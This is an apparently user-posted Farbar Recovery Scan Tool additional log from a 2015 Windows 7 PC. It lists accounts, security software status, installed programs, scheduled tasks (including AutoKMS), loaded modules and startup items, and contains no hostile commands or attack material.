C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-08-12 00:38

==================== End of log ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version:11-08-2015 02
Ran by Gianluca (2015-08-12 20:01:53)
Running from D:\Download
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1973368479-3414220156-1287075655-500 - Administrator - Disabled)
Gianluca (S-1-5-21-1973368479-3414220156-1287075655-1000 - Administrator - Enabled) => C:\Users\Gianluca
Guest (S-1-5-21-1973368479-3414220156-1287075655-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Avira Antivirus (Disabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AS: Avira Antivirus (Disabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-1973368479-3414220156-1287075655-1000\...\uTorrent) (Version: 3.3.2.30303 - BitTorrent Inc.)
Adobe Flash Player 16 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated)
AdVenture Capitalist (HKLM-x32\...\Steam App 346900) (Version: - Hyper Hippo Games)
AMD Catalyst Install Manager (HKLM\...\{F37C2975-92EA-59CA-59E6-50E56F0E76DD}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
Apple Mobile Device Support (HKLM\...\{439760BC-7737-4386-9B1D-A90A3E8A22EA}) (Version: 3.4.1.2 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ATI AVIVO64 Codecs (Version: 11.6.0.50825 - ATI Technologies Inc.) Hidden
Avira (HKLM-x32\...\{a5e00a72-db4a-4f77-8874-d1265b8fcd7e}) (Version: 1.1.42.10415 - Avira Operations GmbH & Co. KG)
Avira (x32 Version: 1.1.42.10415 - Avira Operations GmbH & Co. KG) Hidden
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.11.579 - Avira Operations GmbH & Co. KG)
BioShock (HKLM-x32\...\{E280923D-C5D9-4728-8C79-AC9A0DC75875}) (Version: 2.5.0000 - 2K Games)
Bluetooth Win7 Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.2.0.40 - Atheros Communications)
Bonjour (HKLM\...\{CA0D2F09-F811-48D4-843E-C87696C6A9D9}) (Version: 3.0.0.2 - Apple Inc.)
CameraHelperMsi (x32 Version: 13.31.1038.0 - Logitech) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 3.15 - Piriform)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.4.5000 - CDBurnerXP)
CPUID HWMonitor Pro 1.10.1 (HKLM\...\CPUID HWMonitorPro_is1) (Version: - )
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Deluge 1.3.11 (HKLM-x32\...\Deluge) (Version: - )
Driver Pinnacle Video (HKLM\...\{6DE721A5-5E89-4D74-994C-652BB3C0672E}) (Version: 12.1.0.030 - Pinnacle Systems)
Edirol HQ Orchestral VSTi v1.03 (HKLM-x32\...\Edirol HQ Orchestral VSTi v1.03) (Version: - )
erLT (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
EZdrummer (HKLM-x32\...\{43E8D9E7-AFC9-4BA3-8106-B95E02B87AB7}) (Version: 1.1.6 - Toontrack)
EZXCocktail (HKLM-x32\...\{147567F0-8575-4BE0-B5B3-62706C67FA5A}) (Version: 1.0 - Toontrack)
EZXDfh (HKLM-x32\...\{DB1299AF-9EE0-422B-959E-F4171B2AE0F7}) (Version: 1.0 - Toontrack)
EZXFunkmasters (HKLM-x32\...\{BB5A44CB-3045-43E2-BEB0-B64E477D4633}) (Version: 1.0.0 - Toontrack)
EZXJazz (HKLM-x32\...\{EED8D44F-CEBB-4298-8D0E-E01AF6AC0663}) (Version: 1.0.0 - Toontrack)
EZXPercussion (HKLM-x32\...\{2CC4BC82-41CF-43D3-B533-7283AA8BB86F}) (Version: 1.0 - Toontrack)
Facebook Video Calling 3.1.0.521 (HKLM-x32\...\{2091F234-EB58-4B80-8C96-8EB78C808CF7}) (Version: 3.1.521 - Skype Limited)
Foxit Reader 5.0 (HKLM-x32\...\Foxit Reader_is1) (Version: 5.0.2.718 - Foxit Corporation)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version: - )
Game Booster (HKLM-x32\...\Game Booster_is1) (Version: 2.3.0.0 - IObit)
GlaceVerb 1.01 (HKLM-x32\...\GlaceVerb_is1) (Version: - Dasample)
Google Chrome (HKU\S-1-5-21-1973368479-3414220156-1287075655-1000\...\Google Chrome) (Version: 44.0.2403.130 - Google Inc.)
Grand Theft Auto IV (x32 Version: 1.0.0013.131 - Rockstar Games Inc.) Hidden
Grand Theft Auto: Episodes from Liberty City (x32 Version: 1.0.0002.135 - Rockstar Games Inc.) Hidden
Grand Theft Auto: Episodes from Liberty City (x32 Version: 1.0.0003.135 - Rockstar Games Inc.) Hidden
Guitar Pro 5.2 (HKLM-x32\...\Guitar Pro 5_is1) (Version: - Arobas Music)
Happy Wars (HKLM-x32\...\Steam App 246280) (Version: - Toylogic inc.)
HP LaserJet Professional P1100-P1560-P1600 Series (HKLM\...\HP LaserJet Professional P1100-P1560-P1600 Series) (Version: - )
install (Version: 1.2.0000 - Adobe Systems Incorporated) Hidden
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.2.1410 - Intel Corporation)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 15.4 - Intel)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.1.0.1008 - Intel Corporation)
Intel® Watchdog Timer Driver (Intel® WDT) (HKLM-x32\...\{3FD0C489-0F02-481a-A3E1-9754CD396761}) (Version: - Intel Corporation)
iTunes (HKLM\...\{B613A9BB-2B34-4824-A4BE-2427653D59D6}) (Version: 10.4.0.80 - Apple Inc.)
Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)
JMicron JMB36X Driver (HKLM-x32\...\{3A1B5D40-41E9-43FA-8C7B-A8667F5586EF}) (Version: 1.17.58.2 - JMicron Technology Corp.)
Kazrog LLC Recabinet 3 VST RTAS v3.0.4 (HKLM-x32\...\Kazrog LLC Recabinet 3 VST RTAS v3.0.4_is1) (Version: - )
K-Lite Mega Codec Pack 9.7.0 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 9.7.0 - )
L.A. Noire (HKLM-x32\...\{915726DF-7891-444A-AA03-0DF1D64F561A}) (Version: 1.00.0000 - Rockstar Games)
L.A. Noire Update v1.3.2613 (HKLM-x32\...\L.A Noire_is1) (Version: - )
LWS VideoEffects (Version: 13.30.1379.0 - Logitech) Hidden
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
marvell 91xx console driver (HKLM-x32\...\MagniDriver) (Version: 1.0.0.1045 - Marvell)
MATLAB R2010a (HKLM\...\MatlabR2010a) (Version: 7.10 - The MathWorks, Inc.)
Microsoft .NET Framework 4 Client Profile - Language Pack (ITA) (HKLM\...\Microsoft .NET Framework 4 Client Profile ITA Language Pack) (Version: 4.0.30320 - Microsoft Corporation)
Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Office 2010 Service Pack 1 (SP1) (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version: - Microsoft)
Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.6029.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20913.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
MiPony 2.2.1 (HKLM-x32\...\MiPony) (Version: 2.2.1 - )
MotioninJoy Gamepad tool 0.7.1001 (HKLM\...\{330DAC67-5B62-452A-A0E4-6B4A5923940F}_is1) (Version: 0.7.1001 - www.motioninjoy.com)
Mozilla Firefox 39.0.3 (x86 it) (HKLM-x32\...\Mozilla Firefox 39.0.3 (x86 it)) (Version: 39.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
Native Instruments Guitar Rig 3 (HKLM-x32\...\Native Instruments Guitar Rig 3) (Version: - )
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.0 - )
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2-r5875) (Version: - )
Pinnacle Studio 15 (HKLM-x32\...\{1362E602-9625-42D3-B57F-CDA9D26F9DA8}) (Version: 15.0.0.7593 - Pinnacle Systems)
PowerISO (HKLM-x32\...\PowerISO) (Version: 4.8 - PowerISO Computing, Inc.)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.993 - Even Balance, Inc.)
QuickTime (HKLM-x32\...\{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}) (Version: 7.73.80.64 - Apple Inc.)
Raccolta foto di Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Raptr (HKLM-x32\...\Raptr) (Version: - )
Realtek Ethernet Controller Driver For Windows 7 (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.21.531.2010 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6235 - Realtek Semiconductor Corp.)
REAPER (x64) (HKLM\...\REAPER) (Version: - )
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.26.0 - Renesas Electronics Corporation)
Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 2.0.26.0 - Renesas Electronics Corporation) Hidden
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.0.0.0 - Rockstar Games)
Sam Shutdown Timer (HKLM-x32\...\{A251CCAC-CCFF-4C1D-8C70-796BECC46682}) (Version: 1.0.0 - SameerSite.com)
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.27.0 - SAMSUNG Electronics Co., Ltd.)
Setup - Resident Evil HD Remaster © Capcom ... (HKLM-x32\...\Setup - Resident Evil HD Remaster © Capcom ...) (Version: ... - Capcom)
SFPack (HKLM-x32\...\Megota Software SFPack Uninstall) (Version: - )
Skype™ 7.6 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.6.105 - Skype Technologies S.A.)
Software della webcam Logitech (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.0 - Logitech Inc.)
Steam (HKLM-x32\...\Steam) (Version: - Valve Corporation)
Stronghold Kingdoms (HKLM-x32\...\Steam App 47410) (Version: - FireFly Studios)
Superior Drummer 64 bit (HKLM\...\{22029AEE-38DF-4E35-AEF4-FE8CA3F6667F}) (Version: 2.2.3 - Toontrack)
Superior Drummer Installer (HKLM-x32\...\{009AC76E-1A66-4682-82B7-417E77F3C648}) (Version: 2.0.1 - Toontrack)
Supporto applicazioni Apple (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
System Requirements Lab CYRI (HKLM-x32\...\{1F77C418-2C90-459C-BD33-B56A4182B9FA}) (Version: 4.4.26.0 - Husdawg, LLC)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.14 - TeamSpeak Systems GmbH)
TeamViewer 9 (HKLM-x32\...\TeamViewer 9) (Version: 9.0.32494 - TeamViewer)
ThermaCAM Researcher Pro 2.8 SR-3 (HKLM-x32\...\{A4883278-90CD-4D7E-BE63-602397384853}) (Version: - )
Toontrack solo (HKLM-x32\...\{5866520C-8857-4986-833A-039F4584C3F7}) (Version: 1.1.1 - Toontrack)
T-RackS 3 Deluxe (HKLM-x32\...\{423C4130-EBC3-410A-B3A0-37BBF9D607D5}) (Version: 3.1.1 - IK Multimedia)
TuxGuitar 1.2 (HKLM-x32\...\TuxGuitar_0) (Version: - )
VLC media player 1.1.10 (HKLM-x32\...\VLC media player) (Version: 1.1.10 - VideoLAN)
Waves Complete V9r13 (HKLM-x32\...\{91000001-C561-4E32-99EB-3C5AD3683A70}) (Version: 9.1.13 - Waves)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
WinRAR gestione archivi (HKLM-x32\...\WinRAR archiver) (Version: - )

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll (Google Inc.)

==================== Restore Points =========================

06-07-2015 20:29:34 Punto di controllo pianificato
13-07-2015 21:02:12 Punto di controllo pianificato
21-07-2015 13:35:16 Punto di controllo pianificato
09-08-2015 17:16:12 Punto di controllo pianificato
11-08-2015 00:48:54 Installed QuickTime 7

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2015-05-07 12:01 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {194464DB-C9B5-4BC4-94D8-876FD9FC46D8} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
Task: {6210C999-490B-4CB2-B22F-2456CE4E049D} - System32\Tasks\{168C729A-6C4E-46D3-BF71-18F8B46C3C33} => pcalua.exe -a "C:\Program Files (x86)\R.G. Mechanics\Fallout 3\Data\_CNV_Fallout-3_TESTO__TBH_.exe" -d "C:\Program Files (x86)\R.G. Mechanics\Fallout 3\Data"
Task: {AB21A897-0FDA-403C-A0C6-1A85CA0BA989} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000UA => C:\Users\Gianluca\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-13] (Facebook Inc.)
Task: {AFA4D7F7-7182-4EC2-A928-2D864BB159C8} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000Core => C:\Users\Gianluca\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-13] (Facebook Inc.)
Task: {B0A718D8-55D7-49AB-9C18-C0C6DEE27872} - System32\Tasks\{3C525D42-E870-4868-A529-62358657886A} => D:\Desktop\Università\Borsista 2015\Gianluca\OTACS\OTACS.exe [2013-08-13] ()
Task: {CA3DCFBC-7722-4E58-A431-9010EC5EC440} - System32\Tasks\{B0BB2048-C7DA-4AC9-A1AF-979FC963DBC8} => D:\Documenti\Roba TomTom\modifica tomtom\patchYDG Dos\patchYDG Dos\patchYDG.exe [2009-03-26] ()
Task: {DECD53F3-6979-45CD-841F-D4B47A1F0BE1} - System32\Tasks\{4F03802F-5B4F-465C-B291-27496FC999FA} => pcalua.exe -a "G:\P8P67 drv aggiornati\Intel_Chipset_V9301019_XPVistaWin7\Intel_Chipset_V9301019_XPVistaWin7\netfx\dotnetfx35\dotnetfx35.exe" -d "G:\P8P67 drv aggiornati\Intel_Chipset_V9301019_XPVistaWin7\Intel_Chipset_V9301019_XPVistaWin7\netfx\dotnetfx35"
Task: {E5A4F826-874E-4F88-9CB5-BB20D53BAEFE} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000UA => C:\Users\Gianluca\AppData\Local\Google\Update\GoogleUpdate.exe [2014-10-24] (Google Inc.)
Task: {FE4A0195-B127-44D0-A31A-A100DDCAB283} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000Core => C:\Users\Gianluca\AppData\Local\Google\Update\GoogleUpdate.exe [2014-10-24] (Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000Core.job => C:\Users\Gianluca\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000UA.job => C:\Users\Gianluca\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000Core.job => C:\Users\Gianluca\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000UA.job => C:\Users\Gianluca\AppData\Local\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (Whitelisted) ==============

2015-04-22 10:51 - 2012-08-31 15:03 - 00288768 _____ () C:\Windows\System32\HP1100LM.DLL
2015-04-22 10:51 - 2012-08-31 15:02 - 00074240 _____ () C:\Windows\system32\spool\PRTPROCS\x64\HP1100PP.DLL
2010-11-03 11:30 - 2010-11-03 11:30 - 00918144 ____R () C:\Program Files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe
2010-12-02 04:15 - 2010-12-02 04:15 - 00915584 ____R () C:\Program Files (x86)\ASUS\AAHM\1.00.13\aaHMSvc.exe
2011-07-22 19:00 - 2010-10-21 11:52 - 00586880 ____R () C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe
2011-07-10 22:04 - 2014-11-05 19:39 - 00076152 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2011-07-22 19:00 - 2015-08-12 13:15 - 00023040 _____ () C:\Program Files (x86)\ASUS\AXSP\1.00.13\PEbiosinterface32.dll
2011-07-22 19:00 - 2010-06-29 04:58 - 00104448 ____R () C:\Program Files (x86)\ASUS\AXSP\1.00.13\ATKEX.dll
2011-07-09 13:56 - 2010-11-05 23:50 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
2012-10-11 22:56 - 2012-10-11 22:56 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2012-10-11 22:56 - 2012-10-11 22:56 - 01242512 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2015-08-08 23:53 - 2015-07-31 08:19 - 01405768 _____ () C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\44.0.2403.130\libglesv2.dll
2015-08-08 23:53 - 2015-07-31 08:19 - 00081224 _____ () C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\44.0.2403.130\libegl.dll
2011-08-06 18:32 - 2006-07-04 09:25 - 00077824 _____ () C:\Program Files (x86)\Guitar Pro 5\rse\dll\G01.dll
2011-08-06 18:32 - 2006-06-30 09:18 - 02203648 _____ () C:\Program Files (x86)\Guitar Pro 5\rse\dll\O03.dll
2011-08-06 18:32 - 2006-05-30 07:03 - 00004608 _____ () C:\Program Files (x86)\Guitar Pro 5\rse\dll\F03.dll
2014-01-19 16:12 - 2015-04-16 19:40 - 00776192 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2015-03-06 19:22 - 2015-04-23 04:16 - 04962816 _____ () C:\Program Files (x86)\Steam\v8.dll
2015-03-06 19:22 - 2015-04-23 04:16 - 01556992 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2015-03-06 19:22 - 2015-04-23 04:16 - 01187840 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2014-05-22 07:11 - 2015-06-04 20:56 - 02407104 _____ () C:\Program Files (x86)\Steam\video.dll
2014-10-15 17:57 - 2014-12-01 23:31 - 02396672 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2014-10-15 17:57 - 2014-12-01 23:31 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2014-10-15 17:57 - 2014-12-01 23:31 - 00479744 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2014-10-15 17:57 - 2014-12-01 23:31 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2014-10-15 17:57 - 2014-12-01 23:31 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2014-01-19 16:12 - 2015-06-04 20:56 - 00703168 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2014-01-19 16:12 - 2015-05-11 21:01 - 36302728 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll
2015-05-16 18:10 - 2015-05-11 21:01 - 08958344 _____ () C:\Program Files (x86)\Steam\bin\pdf.dll
2015-08-08 23:53 - 2015-07-31 08:19 - 16308040 _____ () C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\44.0.2403.130\PepperFlash\pepflashplayer.dll

==================== Alternate Data Streams (Whitelisted) =========

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1973368479-3414220156-1287075655-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Gianluca\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 62.94.0.41 - 62.94.0.42
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Monitor Apache Servers.lnk => C:\Windows\pss\Monitor Apache Servers.lnk.CommonStartup
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: AdobeCS5ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: ASUS ShellProcess Execute => C:\Program Files (x86)\ASUS\AI Suite II\ASUS Mobilink\Simulator\AsShellProcess.exe
MSCONFIG\startupreg: AthBtTray => "C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe"
MSCONFIG\startupreg: AtherosBtStack => "C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe"
MSCONFIG\startupreg: Avira Systray => C:\Program Files (x86)\Avira\My Avira\Avira.OE.Systray.exe
MSCONFIG\startupreg: Facebook Update => "C:\Users\Gianluca\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver
MSCONFIG\startupreg: IAStorIcon => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: JMB36X IDE Setup => C:\Windows\RaidTool\xInsIDE.exe
MSCONFIG\startupreg: KiesPreload => C:\Program Files (x86)\Samsung\Kies\Kies.exe /preload
MSCONFIG\startupreg: KiesTrayAgent => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
MSCONFIG\startupreg: LWS => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe -hide
MSCONFIG\startupreg: msnmsgr => "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background
